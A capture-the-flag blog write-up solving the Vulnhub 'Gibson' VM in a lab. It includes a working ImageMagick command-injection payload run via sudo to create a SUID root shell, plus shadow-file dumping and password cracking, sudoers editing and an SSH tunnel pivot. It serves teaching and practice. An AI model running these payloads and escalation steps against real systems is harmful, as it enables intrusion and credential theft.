Infosec, CTF and more

Gibson Solution

In this post I’m going to show you how to solve the Gibson VM provided by Knightmare.

You can find the VM on this link <== attacker <== victim

I run nmap to check which services are running on the machine:

nmap -sV -p- -Pn -n -v -oA

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7
MAC Address: 08:00:27:5B:0C:58 (Oracle VirtualBox virtual NIC)
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ok, just two TCP ports open.

I have a look at the website at and this is what I find a link to

So, I click the link and this is what I find a page that says: “The answer you seek will be found by brute force”.

So, if I understand well, he wants me to fuzz URLs…don’t fall in the trap! I check the source code of the page and this is what I find:

<title>Gibson Mining Corporation</title>
<!-- Damn it Margo! Stop setting your password to "god" -->
<!-- at least try and use a different one of the 4 most -->
<!-- common ones! (eugene) -->
<h1> The answer you seek will be found by brute force</h1>

Now, since I want to trust my friend “eugene” I try to ssh with the user margo and password god:

# ssh margo@
Ubuntu 14.04.3 LTS
margo@'s password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)

  System information as of Tue May 17 13:23:07 BST 2016

  System load: 0.0               Memory usage: 6%   Processes:       81
  Usage of /:  82.2% of 1.85GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:

margo@gibson:~$ whoami
margo@gibson:~$ id
uid=1002(margo) gid=1002(margo) groups=1002(margo),27(sudo)

It would be wonderful if I found a sudoer, but no, margo is not a sudoer, although she (or he) can run just one command as sudoer:

margo@gibson:~$ sudo -l
Matching Defaults entries for margo on gibson:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User margo may run the following commands on gibson:
    (ALL) NOPASSWD: /usr/bin/convert
margo@gibson:~$ which convert

Uhm… I have a look at the passwd file:

margo@gibson:~$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
libvirt-qemu:x:106:106:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:107:111:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
duke:x:1000:1000:Duke Ellingson,,,:/home/duke:/bin/bash
colord:x:108:115:colord colour management daemon,,,:/var/lib/colord:/bin/false
eugene:x:1001:1001:Eugene Belford:/home/eugene:
margo:x:1002:1002:Margo Wallace:/home/margo:/bin/bash

I have a look if there’s any exploit for the convert command, and I find out about a ImageMagick exploit on this link At this point I write the following script to spawn a root shell setting the root SUID:

margo@gibson:~$ cat exploit.jpg 
push graphic-context
viewbox 0 0 640 480
fill 'url("|cp /bin/sh myshell; chmod 4777 myshell")'
pop graphic-context

margo@gibson:~$ sudo /usr/bin/convert exploit.jpg exploit.png
chmod: cannot access myshell: No such file or directory
convert: unrecognized color `"|cp /bin/sh myshell; chmod 4777 myshell"' @ warning/color.c/GetColorCompliance/947.
convert: unable to open image `/tmp/magick-KzaGfMI2': No such file or directory @ error/blob.c/OpenBlob/2638.
convert: unable to open file `/tmp/magick-KzaGfMI2': No such file or directory @ error/constitute.c/ReadImage/583.
convert: non-conforming drawing primitive definition `fill' @ error/draw.c/DrawImage/3158.

margo@gibson:~$ ls -l
-rw-rw-r-- 1 margo margo     146 May 17 18:46 exploit.jpg
-rw-r--r-- 1 root  root      421 May 17 18:46 exploit.png
-rwsrwxrwx 1 root  root   121272 May 17 18:46 myshell

margo@gibson:~$ margo@gibson:~$ ./myshell2 
# id
uid=1002(margo) gid=1002(margo) euid=0(root) groups=0(root),27(sudo),1002(margo)
# cat /etc/shadow

Sweet, I have a root shell and I got all the hashes of passwords of the users on this machine. I download the passwd and shadow files on my local machine, I unshadow them and I use John the Ripper to crack them:

root@kali:/media/sf_shared_folders/linux/pentest/gibson# unshadow passwd shadow > users_hashes
root@kali:/media/sf_shared_folders/linux/pentest/gibson# ls -l
total 24
-rwxrwx--- 1 root vboxsf  507 May 17 13:33
-rwxrwx--- 1 root vboxsf  761 May 17 13:33
-rwxrwx--- 1 root vboxsf 2567 May 17 13:33
-rwxrwx--- 1 root vboxsf 1545 May 18 20:02 passwd
-rwxrwx--- 1 root vboxsf 1122 May 18 20:01 shadow
-rwxrwx--- 1 root vboxsf 1836 May 18 20:06 users_hashes

root@kali:/media/sf_shared_folders/linux/pentest/gibson# john -stdin users_hashes 
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press Ctrl-C to abort, or send SIGUSR1 to john process for status

It might take time, and it’s not even sure that I’ll crack them, so in the meantime I go and check if there’s anything else interesting on the server. After all, I’m root not ;) First thing, I prefer a bash shell more than a sh shell, so I add the user margo in the sudoers:

# vim /etc/sudoers

# User privilege specification
root    ALL=(ALL:ALL) ALL
margo   ALL=(ALL:ALL) ALL

# su - margo
margo@gibson:~$ sudo su
[sudo] password for margo: god

Sweet, now margo is a sudoer (a sudoer with god as password…) I discover that the server is connected to another subnet 192.168.122.x, and it has IP I also discover that the server is listening on port 5900:

root@gibson:~# lsof -i
dhclient   529            root    6u  IPv4   9748      0t0  UDP *:bootpc 
dhclient   529            root   20u  IPv4   9682      0t0  UDP *:50353 
dhclient   529            root   21u  IPv6   9683      0t0  UDP *:12810 
sshd       946            root    3u  IPv4  10635      0t0  TCP *:ssh (LISTEN)
sshd       946            root    4u  IPv6  10637      0t0  TCP *:ssh (LISTEN)
apache2   1107            root    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1124        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1125        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1126        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1127        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1128        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
dnsmasq   1237 libvirt-dnsmasq    4u  IPv4  11066      0t0  UDP *:bootps 
dnsmasq   1237 libvirt-dnsmasq    6u  IPv4  11069      0t0  UDP 
dnsmasq   1237 libvirt-dnsmasq    7u  IPv4  11070      0t0  TCP (LISTEN)
qemu-syst 1247    libvirt-qemu   10u  IPv4  11304      0t0  TCP localhost:5900 (LISTEN)
apache2   1343        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
sshd      1901            root    3u  IPv4  25545      0t0  TCP> (ESTABLISHED)
sshd      1990           margo    3u  IPv4  25545      0t0  TCP> (ESTABLISHED)

root@gibson:~# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     udp  --  anywhere             anywhere             udp dpt:domain
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:domain
ACCEPT     udp  --  anywhere             anywhere             udp dpt:bootps
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:bootps

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     all  --  anywhere        ctstate RELATED,ESTABLISHED
ACCEPT     all  --     anywhere            
ACCEPT     all  --  anywhere             anywhere            
REJECT     all  --  anywhere             anywhere             reject-with icmp-port-unreachable
REJECT     all  --  anywhere             anywhere             reject-with icmp-port-unreachable

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     udp  --  anywhere             anywhere             udp dpt:bootpc

root@gibson:~# ps aux | grep qemu-syst
libvirt+  1247  0.5 14.6 841876 111356 ?       Sl   13:23   2:07 /usr/bin/qemu-system-x86_64 -name ftpserv -S -machine pc-i440fx-trusty,accel=tcg,usb=off -m 256 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid ebcdaa6c-b10a-d758-c13a-0fb296b011f1 -no-user-config -nodefaults -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/ftpserv.monitor,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc -no-shutdown -boot strict=on -device piix3-usb-uhci,id=usb,bus=pci.0,addr=0x1.0x2 -drive file=/var/lib/libvirt/images/ftpserv.img,if=none,id=drive-ide0-0-0,format=raw -device ide-hd,bus=ide.0,unit=0,drive=drive-ide0-0-0,id=ide0-0-0,bootindex=2 -drive if=none,id=drive-ide0-1-0,readonly=on,format=raw -device ide-cd,bus=ide.1,unit=0,drive=drive-ide0-1-0,id=ide0-1-0,bootindex=1 -netdev tap,fd=23,id=hostnet0 -device rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:72:e2:fb,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -vnc -device cirrus-vga,id=video0,bus=pci.0,addr=0x2 -device intel-hda,id=sound0,bus=pci.0,addr=0x4 -device hda-duplex,id=sound0-codec0,bus=sound0.0,cad=0 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x5
root      3166  0.0  0.2  11756  2256 pts/3    S+   20:04   0:00 grep --color=auto qemu-syst

Looks like that a VM is running onto the server, and the image is located on /var/lib/libvirt/images/ftpserv.img. So, I create a port forwarding from the server to my local machine to connect on VNC on the VM into the server:

root@gibson:~# ssh root@ -R 1111:localhost:5900 -N
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is b2:bf:20:bb:1a:e7:2e:bc:e0:26:1d:fb:f1:c8:7e:46.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
root@'s password: 
Permission denied, please try again.
root@'s password: 

root@gibson:~# ssh root@ -R 1111:localhost:5900 -N

root@kali:/media/sf_shared_folders/linux/pentest/gibson# vncviewer localhost:1111
Connected to RFB server, using protocol version 3.8
No authentication needed
Authentication successful
Desktop name "QEMU (ftpserv)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

Once connected a terminal appears. I wonder around and I find a folder called GARBAGE (since I watched Hackers I have a feeling that I’m on the right way). I get the files from that folder to my local to inspect them. The files are 3:

root@kali:/media/sf_shared_folders/linux/pentest/gibson/GARBAGE# ls -l
total 164
-rwxrwx--- 1 root vboxsf 73185 May 17 21:11 ADMINSPO.JPG
-rwxrwx--- 1 root vboxsf 87902 May 17 21:15 FLAG.IMG
-rwxrwx--- 1 root vboxsf  1577 May 19 13:43 JZ_UG.ANS

All the files that I inspect are corrupted, so I download the image of the VM running on the server and I mount it on my computer:

root@kali:/media/root/KFYLNN1/GARBAGE# ls -l
total 856
-rw-r--r-- 1 root root 123141 May  4 22:17 adminspo.jpg
-rw-r--r-- 1 root root 737280 May 14 14:19 flag.img
-rw-r--r-- 1 root root   1601 Jun 11  2002 jz_ug.ans

root@kali:/media/root/KFYLNN1/GARBAGE# exif adminspo.jpg 
EXIF tags in 'ADMINSPO.JPG' ('Motorola' byte order):
Tag                 |Value
Image Description   |Rabbit.. Flu Shot... TYPE COOKE YOU IDIOT! I'll head them 
Date and Time       |2016:05:04 22:29:32
Artist              |Virtualization is fun.. What's more, esoteric OSes on 192.
X-Resolution        |72
Y-Resolution        |72
Resolution Unit     |Inch
User Comment        |So there's info here.... Images, hmm... Wasn't that a CVE.
Exif Version        |Exif Version 2.1
FlashPixVersion     |FlashPix Version 1.0
Colour Space        |Internal error (unknown value 65535)

root@kali:/media/root/KFYLNN1/GARBAGE# cat jz_ug.ans

    �������������������������۲���������� ��������۲�����۲���������������
    ���������������������������������������������������� �����������������
    ޲���������۲�����۲�����������    �����۲���    ����������߲������۲�
     ��߱� ����������߲����������߲    �����߲���    ����߲���߲��ݲ����߲jz
                                  �                            �         �
                    the ugliest of all are under 5 feet tall

root@kali:/media/root/KFYLNN1/GARBAGE# file flag.img
flag.img: Linux rev 1.0 ext2 filesystem data, UUID=d59bdd40-ec37-4d24-a956-80f549846121

I mount the partition flag.img and this is what I find:

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# ls -la
total 70
drwxr-xr-x  4 root root  1024 May 14 14:07 .
drwxr-x---+ 5 root root  4096 May 19 14:55 ..
-rwxrwxr-x  1 root root 21358 Nov 16  2011 davinci
-rw-r--r--  1 root root 28030 Nov 16  2011 davinci.c
-rw-r--r--  1 root root   159 May  5 19:56 hint.txt
drwx------  2 root root 12288 May  5 19:39 lost+found
drwxr-xr-x  2 root root  1024 May  5 20:07 .trash

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cd .trash
root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# ls -la
total 319
drwxr-xr-x 2 root root   1024 May  5 20:07 .
drwxr-xr-x 4 root root   1024 May 14 14:07 ..
---x------ 1 root root    469 May 14 14:18 flag.txt.gpg
-rw-r--r-- 1 root root 320130 Sep  7  2015 LeithCentralStation.jpg

I check the hint.txt file and this is what I find:

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cat hint.txt and have
someone in common... Can you remember his
original nom de plume in 1988...?

The only person these two Films have in common is Jonny Lee Miller. I check his Wikipedia page and I see that his nom de plume (or nickname) was Zero Cool. I try to decrypt the file flag.txt.gpg using the passphrase zerocool, but it doesn’t work. After various attempts, I create a wordlist with the all the possible combinations of the word zerocool, and at the end the right passphrase is Z3r0K00l:

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121/.trash# gpg --decrypt flag.txt.gpg 
gpg: CAST5 encrypted data
gpg: encrypted with 1 passphrase
 _   _            _      _____ _             ____  _                  _   _
| | | | __ _  ___| | __ |_   _| |__   ___   |  _ \| | __ _ _ __   ___| |_| |
| |_| |/ _` |/ __| |/ /   | | | '_ \ / _ \  | |_) | |/ _` | '_ \ / _ \ __| |
|  _  | (_| | (__|   <    | | | | | |  __/  |  __/| | (_| | | | |  __/ |_|_|
|_| |_|\__,_|\___|_|\_\   |_| |_| |_|\___|  |_|   |_|\__,_|_| |_|\___|\__(_)

Should you not be standing in a 360 degree rotating payphone when reading
this flag...? B-)

Anyhow, congratulations once more on rooting this VM. This time things were
a bit esoteric, but I hope you enjoyed it all the same.

Shout-outs again to #vulnhub for hosting a great learning tool. A special
thanks goes to g0blin and GKNSB for testing, and to g0tM1lk for the offer
to host the CTF once more.
gpg: WARNING: message was not integrity protected

Nice one, it was very original, I loved it. Thank you to Knightmare for the VM and Vulnhub for hosting it. For any information or comment, please do not hesitate to leave a comment.